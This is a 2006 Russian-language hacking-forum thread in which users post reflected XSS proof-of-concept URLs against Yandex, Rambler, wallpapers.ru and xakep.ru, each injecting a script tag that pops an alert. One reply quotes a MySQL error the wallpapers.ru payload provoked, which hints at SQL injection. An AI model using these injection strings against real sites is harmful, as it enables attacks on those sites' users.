HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

XSS на Yandex.RU
  #1  
Старый 08.04.2006, 21:48
Gang100
Banned
Регистрация: 18.02.2006
Сообщений: 37
С нами: 10644806

Репутация: 52
По умолчанию XSS на Yandex.RU

Нашел XSS на Яндексе (IE)

_http://www.yandex.ru/yandsearch?Link="><script>alert('found_by_Gang100' )</script>

Последний раз редактировалось Gang100; 08.04.2006 в 22:03..
 

  #2  
Старый 08.04.2006, 21:50
tclover
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
С нами: 10741286

Репутация: 1847


По умолчанию

На ФФ не работает
 

  #3  
Старый 08.04.2006, 21:56
member_ru
Познающий
Регистрация: 08.12.2005
Сообщений: 59
С нами: 10747925

Репутация: 5
По умолчанию

Чёт и у меня не пашет, пофиксили что-ли уже ?
 

  #4  
Старый 08.04.2006, 21:57
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию

как сказал маленький литовский мальчик: "ну и что?" +))
их там сотни
в опере тоже не работает...
 

  #5  
Старый 08.04.2006, 21:59
Gang100
Banned
Регистрация: 18.02.2006
Сообщений: 37
С нами: 10644806

Репутация: 52
По умолчанию

мда-пс работает только в Ie
 

  #6  
Старый 08.04.2006, 22:04
Гаврила
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
С нами: 10812683

Репутация: 134
По умолчанию

И на Рамблере
http://www.rambler.ru/cgi-bin/advanced.cgi?set="><script>alert('found_by_Gavrila ')</script>
 

  #7  
Старый 08.04.2006, 22:25
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

XSS на популярном портале))

http://wallpapers.ru/cgi-bin/forum/top.pl?author="><script>alert('xss')</script>

+ выдаётся ссобщение

Временные неполадки на сервере баз данных (MySQL)
На сервере баз данных возникли временные неполадки.
Причина: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'xss')' AND icon_autor >= 2' at line
__________________
 

  #8  
Старый 08.04.2006, 22:42
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
С нами: 11156006

Репутация: 749


По умолчанию

Большинство пассивных хсс мультибраузерные. Так же как и эти. (_|_)

На самом деле и на яндексе и на рамблере есть простые мультибраузерные активные хсс, не страдайте ***ней!
 

  #9  
Старый 08.04.2006, 23:25
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
С нами: 11442626

Репутация: 429


По умолчанию

http://www.xakep.ru/post/30551/default.asp?"></iframe><script>alert(/xss/)</script><xexe="
такаяже байда точно такая же пасивная и чего?
 

  #10  
Старый 09.04.2006, 08:55
A110ut
Постоянный
Регистрация: 31.12.2005
Сообщений: 605
С нами: 10715366

Репутация: 661


По умолчанию

как что?! АКОШКА ВЫСКАЧЕЛО! Я ХАЦКНУЛ ХАЦКЕР! :]
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss в Nm Gho_st Уязвимости Mail-сервис 1 17.03.2006 21:10
Xss на yandex.ru Pridu_ROCK Уязвимости 1 04.03.2006 01:08
XSS в Phorum<=5.0.14 tester2005 Уязвимости 22 17.03.2005 07:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...